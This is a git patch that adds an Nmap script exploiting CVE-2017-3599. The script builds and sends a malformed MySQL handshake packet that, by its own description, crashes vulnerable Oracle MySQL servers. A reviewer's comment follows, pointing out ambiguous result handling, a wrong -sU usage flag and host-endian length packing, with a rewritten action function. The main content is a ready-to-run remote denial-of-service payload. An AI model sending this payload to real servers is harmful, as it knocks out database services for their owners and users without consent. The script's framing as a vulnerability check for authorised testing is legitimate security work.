From e19b2ab80b06ea6884fee5e2aaec896da45b371c Mon Sep 17 00:00:00 2001
From: Loganaden Velvindron
Date: Mon, 8 May 2017 18:21:36 +0400
Subject: [PATCH] Add mysql-vuln-cve2017-3599.nse.

---
 scripts/mysql-vuln-cve2017-3599.nse | 70 +++++++++++++++++++++++++++++
 1 file changed, 70 insertions(+)
 create mode 100644 scripts/mysql-vuln-cve2017-3599.nse

diff --git a/scripts/mysql-vuln-cve2017-3599.nse b/scripts/mysql-vuln-cve2017-3599.nse
new file mode 100644
index 000000000..68f4deb17
--- /dev/null
+++ b/scripts/mysql-vuln-cve2017-3599.nse
@@ -0,0 +1,70 @@
+description=[[
+CVE-2017-3599 - remote unauthenticated Denial of Service against Oracle MySQL.
+Warning: This WILL cause DoS on vulnerable mysql machines.
+Thanks: SECWORKS, hackers.mu team.
+]]
+
+---
+--@usage nmap -sU -p --script mysql-vuln-cve2017-3599 --script-args mysql-vuln-cve2017-3599.ports=
+--@output
+--PORT STATE SERVICE
+--3306/tcp open mysql
+--|_mysql-vuln-cve2017-3599: true
+
+author = "Loganaden Velvindron (logan@hackers.mu)"
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html";
+categories = {"dos", "vuln", "exploit", "intrusive"}
+
+local string = require "string"
+local shortport = require "shortport"
+local bin = require "bin"
+local comm = require "comm"
+local stdnse = require "stdnse"
+
+portrule = function(host, port)
+ if not stdnse.get_script_args(SCRIPT_NAME .. ".ports") then
+ stdnse.print_debug(3,"Skipping '%s' %s, 'ports' argument is missing.",SCRIPT_NAME, SCRIPT_TYPE)
+ return false
+ end
+
+local ports = stdnse.get_script_args(SCRIPT_NAME .. ".ports")
+
+--print out a debug message if port 3306/tcp is open
+ if port.number==3306 and port.protocol == "tcp" and not(ports) then
+ stdnse.print_debug("Port 3306/tcp is open. 
mysql over tcp")
+ return false
+ end
+
+ return port.protocol == "tcp" and stdnse.in_port_range(port, ports:gsub(",",",") ) and
+ not(shortport.port_is_excluded(port.number,port.protocol))
+end
+
+
+local packet1 =
+string.char(0x01)
+..string.char(0x85, 0xa2, 0xbf, 0x01)
+..string.char(0x00, 0x00, 0x00, 0x01)
+..string.char(0x21)
+--..string.char(0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00)
+..string.rep(string.char(0x00),23)
+.."test"
+..string.char(0x00)
+..string.char(0xff)
+
+local packet1_len = bin.pack("i", string.len(packet1)-1)
+packet1_len = string.sub(packet1_len,1,3)
+
+local payload = packet1_len..packet1
+
+
+action = function(host, port)
+local status, result = comm.exchange(host, port, payload, {proto="tcp", recv_before=true, timeout=8000})
+
+
+if not status then
+ return false
+else
+ return true
+end
+
+end
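Review bot: The bare boolean returned by `action` cannot tell the DoS apart from an unreachable target: `comm.exchange` yields a false `status` on any timeout, refused connection or reset, the reason in `result` is thrown away, and the `true` shown in the @output example therefore means the server answered the malformed handshake — the opposite of what a crash looks like, if that is how this bug manifests (the description's warning that it "WILL cause DoS" suggests so). I would surface the transport reason and say which way it points, and consider gating on the server version parsed from the greeting before sending a payload that is advertised to take production servers down. Two smaller points: the @usage line's `-sU` contradicts the portrule, which only accepts `port.protocol == "tcp"`, and `bin.pack("i", ...)` is host-endian, so the three-byte MySQL length prefix is only right on little-endian hosts; `bin.pack("<i", ...)` pins it.
```lua
action = function(host, port)
  local status, result = comm.exchange(host, port, payload, {proto="tcp", recv_before=true, timeout=8000})
  -- A reply means the server handled the malformed handshake; no reply is
  -- consistent with a crash but also with a firewall or a slow host, so
  -- report the transport reason instead of collapsing it into a boolean.
  if status then
    return "server replied to malformed handshake (handled; likely not vulnerable)"
  end
  return string.format("no reply to malformed handshake: %s (possible DoS; verify the service is down)", tostring(result))
end
```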